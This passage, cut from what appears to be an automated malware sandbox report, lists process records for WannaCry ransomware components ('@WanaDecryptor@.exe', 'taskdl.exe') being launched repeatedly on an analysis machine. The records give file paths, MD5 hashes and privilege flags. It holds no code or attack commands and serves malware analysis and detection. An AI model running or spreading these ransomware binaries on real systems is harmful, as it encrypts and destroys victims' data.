                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:111
                                                          Start time:11:59:44
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:112
                                                          Start time:11:59:44
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:113
                                                          Start time:11:59:44
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:114
                                                          Start time:11:59:44
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:115
                                                          Start time:11:59:45
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:116
                                                          Start time:11:59:45
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:117
                                                          Start time:11:59:45
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:118
                                                          Start time:11:59:45
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:119
                                                          Start time:11:59:45
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:120
                                                          Start time:11:59:45
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:121
                                                          Start time:11:59:45
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:122
                                                          Start time:11:59:46
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:123
                                                          Start time:11:59:46
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:124
                                                          Start time:11:59:46
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:125
                                                          Start time:11:59:46
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:126
                                                          Start time:11:59:46
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:127
                                                          Start time:11:59:46
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:128
                                                          Start time:11:59:47
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:129
                                                          Start time:11:59:47
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:130
                                                          Start time:11:59:47
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:131
                                                          Start time:11:59:47
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:132
                                                          Start time:11:59:47
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:133
                                                          Start time:11:59:47
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:134
                                                          Start time:11:59:47
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:135
                                                          Start time:11:59:47
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:136
                                                          Start time:11:59:47
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:137
                                                          Start time:11:59:48
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:138
                                                          Start time:11:59:48
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:139
                                                          Start time:11:59:48
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:140
                                                          Start time:11:59:48
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:141
                                                          Start time:11:59:48
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:142
                                                          Start time:11:59:48
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:143
                                                          Start time:11:59:48
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:144
                                                          Start time:11:59:49
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:145
                                                          Start time:11:59:49
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:146
                                                          Start time:11:59:49
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:147
                                                          Start time:11:59:49
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:148
                                                          Start time:11:59:49
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:149
                                                          Start time:11:59:49
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:150
                                                          Start time:11:59:49
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:151
                                                          Start time:11:59:50
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:152
                                                          Start time:11:59:50
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:153
                                                          Start time:11:59:50
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:154
                                                          Start time:11:59:50
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:155
                                                          Start time:11:59:50
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:156
                                                          Start time:11:59:50
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:157
                                                          Start time:11:59:50
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:158
                                                          Start time:11:59:51
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:159
                                                          Start time:11:59:51
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:160
                                                          Start time:11:59:51
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:161
                                                          Start time:11:59:51
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:162
                                                          Start time:11:59:51
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:163
                                                          Start time:11:59:51
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:164
                                                          Start time:11:59:51
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:165
                                                          Start time:11:59:51
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:166
                                                          Start time:11:59:52
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:167
                                                          Start time:11:59:52
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:168
                                                          Start time:11:59:52
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:169
                                                          Start time:11:59:52
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:170
                                                          Start time:11:59:52
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:171
                                                          Start time:11:59:52
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:172
                                                          Start time:11:59:52
                                                          Start date:16/01/2024
                                                          Path:C:\Windows\System32\dllhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                          Imagebase:0x7ff7d5230000
                                                          File size:21'312 bytes
                                                          MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:173
                                                          Start time:11:59:53
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:174
                                                          Start time:11:59:53
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

